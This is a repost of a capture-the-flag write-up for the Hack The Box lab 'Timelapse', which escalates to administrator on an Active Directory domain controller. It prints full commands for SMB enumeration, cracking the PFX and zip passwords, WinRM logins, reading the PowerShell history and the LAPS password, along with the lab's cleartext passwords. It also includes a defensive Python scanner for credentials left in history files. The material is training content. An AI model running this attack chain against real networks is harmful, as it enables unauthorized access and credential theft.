HTB-Timelapse(Easy)

admin, 2023-10-12 22:40:47

Key points: exporting the private key and certificate from a password-protected PFX for WinRM authentication; sensitive information exposed in the PowerShell history file; LAPS.

Scan

sudo nmap -sT --min-rate 10000 -p- 10.129.227.113 -oA nmapscan/ports    # -oA saves the results under nmapscan/ports.*
grep open nmapscan/ports.nmap | awk -F '/' '{print $1}'    # read the .nmap output and print the first field using / as the separator
grep open nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ','    # -s joins the lines, -d ',' uses a comma as the delimiter
ports=$(grep open nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')
echo $ports    # the port list is now stored in a variable
sudo nmap -sT -sV -sC -O -p$ports 10.129.216.222    # after typing $ports, pressing Tab expands it to the full port list
When 88 (Kerberos), 135, 139 and 445 are open alongside DNS and RPC services, the host can be identified as a domain controller.
0xdf says: this combination of ports (Kerberos + LDAP + DNS + SMB) indicates that it is probably a domain controller.
┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ sudo nmap -sT -sV -sC -O -p$ports 10.129.227.113
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-12 06:39 EDT
Nmap scan report for 10.129.227.113
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-12 13:22:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
5986/tcp  open  wsmans?
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2023-10-12T13:24:39+00:00; +2h43m01s from scanner time.
9389/tcp  open  tcpwrapped
49667/tcp open  unknown
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
59908/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: printer|broadband router|media device|router|print server|WAP|specialized
Running (JUST GUESSING): Ricoh embedded (89%), OneAccess embedded (88%), Sony embedded (88%), HP embedded (86%), Linksys embedded (86%), Brother embedded (86%), Novatel embedded (86%)
OS CPE: cpe:/h:ricoh:aficio_sp_c210sf cpe:/h:oneaccess:1641 cpe:/h:sony:bravia_kdl-32v5500 cpe:/h:hp:laserjet_4250 cpe:/h:brother:nc-130h cpe:/h:brother:hl-2070n cpe:/h:novatel:mifi_2200_3g cpe:/h:sony:fwd-40lx2f
Aggressive OS guesses: Ricoh Aficio SP C210SF printer (89%), OneAccess 1641 router (88%), Sony Bravia V5500-series TV (88%), Sony Bravia W5500-series TV (88%), HP LaserJet 4250 printer (86%), Linksys BEFSR41 EtherFast router (86%), Brother NC-130h print server (86%), Brother HL-2070N printer (86%), Brother HL-5070N printer (86%), Brother MFC-7820N printer (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h42m58s, deviation: 2s, median: 2h42m56s
| smb2-time: 
|   date: 2023-10-12T13:23:53
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds

Enum

On Windows targets, the usual first step is to enumerate the SMB service with smbmap.

smbmap -H timelapse.htb    # if the shares show up as unknown, enumerate further as the guest user

smbmap -H timelapse.htb -u guest

NETLOGON and SYSVOL are standard on a domain controller; ADMIN$, C$ and IPC$ are generally only accessible with administrator privileges. "shares" is a user-defined share. The -R flag recursively lists everything that is readable.

smbmap -H timelapse.htb -u guest -R

After enumerating with smbmap, the share can be accessed with the smbclient client.

smbclient //timelapse.htb/shares

The prompt command turns off the interactive confirmation prompt.



A side note: before this I had also run crackmapexec against SMB, which shows (name:DC01) (domain:timelapse.htb) (signing:True); I am not sure why nmap did not give me these details.

┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ crackmapexec smb 10.129.227.113
SMB         10.129.227.113  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)


The doc retrieved here does not seem to be of much use; it mainly hints at LAPS. The zip is a password-protected archive, which john cracks; after extracting it we get the pfx.


Obtain Keys

This pfx is password-protected. I originally wanted to attack it with certipy, but that failed, so I had to do it the honest way with openssl.

A very good article on this: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ pfx2john legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash

Crack the hash with rockyou.

Result: thuglegacy

┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key

┌──(kali㉿kali)-[~/Desktop/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:

Next, use evil-winrm. The -S flag is needed because certificate authentication generally requires SSL (WinRM over HTTPS on port 5986).

evil-winrm -i 10.129.227.113  -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt



lateral movement

net user legacyy
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/30/2022 6:52:32 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.

The account is a member of *Development, the development group, so it is reasonable to guess that its PowerShell history may contain sensitive information.

https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html

type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

The history reveals an account and its password; use them to move laterally.

evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
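As an added example (not part of the original writeup), a small Python scanner that flags the plaintext-credential patterns seen in the history above (ConvertTo-SecureString -AsPlainText, PSCredential construction, passwords passed to net user) in a PSReadLine ConsoleHost_history.txt and redacts the secret in its report. The sample history and its password values are constructed placeholders modelled on the pattern in this post.

```python
import re
from typing import List

# Constructed sample of a PSReadLine ConsoleHost_history.txt, modelled on the
# pattern in the writeup; the password values are placeholders, not real ones.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER_PASSWORD' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user backup_svc P@ssw0rd! /add
get-aduser -filter * -properties *
exit
"""

# Each pattern names the construct it detects; the optional 'secret' group is
# what gets redacted in the report and 'user' is the account it belongs to.
PATTERNS = [
    ("ConvertTo-SecureString with -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>[^'\"]+)\1.*-AsPlainText", re.I)),
    ("PSCredential object construction",
     re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)),
    ("net user with password on the command line",
     re.compile(r"\bnet\s+user\s+(?P<user>[^\s/]\S*)\s+(?P<secret>[^\s/]\S*)", re.I)),
]


def scan_history(text: str) -> List[dict]:
    """Return one finding per (line, pattern) hit, with the secret redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if match is None:
                continue
            groups = match.groupdict()  # only the groups defined in this pattern
            secret = groups.get("secret")
            findings.append({"line": lineno, "kind": kind, "user": groups.get("user"),
                             "redacted": line.replace(secret, "<redacted>") if secret else line})
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']:>3}: {f['kind']} (user={f['user']})\n    {f['redacted']}")
```

On a live host the same file lives under each profile at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, and Set-PSReadLineOption -HistorySaveStyle SaveNothing stops PSReadLine from writing it at all.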



ROOT

net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

Membership of LAPS_Readers means svc_deploy has the right to read the LAPS-managed local administrator password.

https://0xdf.gitlab.io/2021/11/06/htb-pivotapi.html#get-laps-password

Get-ADComputer DC01 -property 'ms-mcs-admpwd'
Get-ADComputer DC01 -property *

Key output:

DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : uM[3va(s870g6Y]9i]6tMu{j
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

With the root (local administrator) password in hand, move laterally once more.

evil-winrm -i 10.129.227.113  -S -u administrator -p 'uM[3va(s870g6Y]9i]6tMu{j'


Originally published on the WeChat public account 搁浅安全: HTB-Timelapse(Easy)

Posted by admin on 2023-10-12 22:40:47. Source (CN-SEC; keep this link when reposting): http://cn-sec.com/archives/2106417.html
